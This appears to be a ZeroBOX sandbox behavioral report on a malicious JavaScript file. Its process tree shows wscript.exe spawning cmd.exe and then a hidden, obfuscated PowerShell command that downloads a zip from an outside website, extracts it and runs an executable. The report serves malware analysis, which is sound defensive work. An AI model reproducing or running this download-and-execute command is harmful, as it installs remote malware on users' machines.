ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\5943.js

    3048
    • cmd.exe "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE

      1784
      • powershell.exe pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','C:\Users\test22\AppData\Local\Temp/jly79.zip'); Expand-Archive -Path C:\Users\test22\AppData\Local\Temp/jly79.zip -DestinationPath C:\Users\test22\AppData\Local\Temp;

        2344
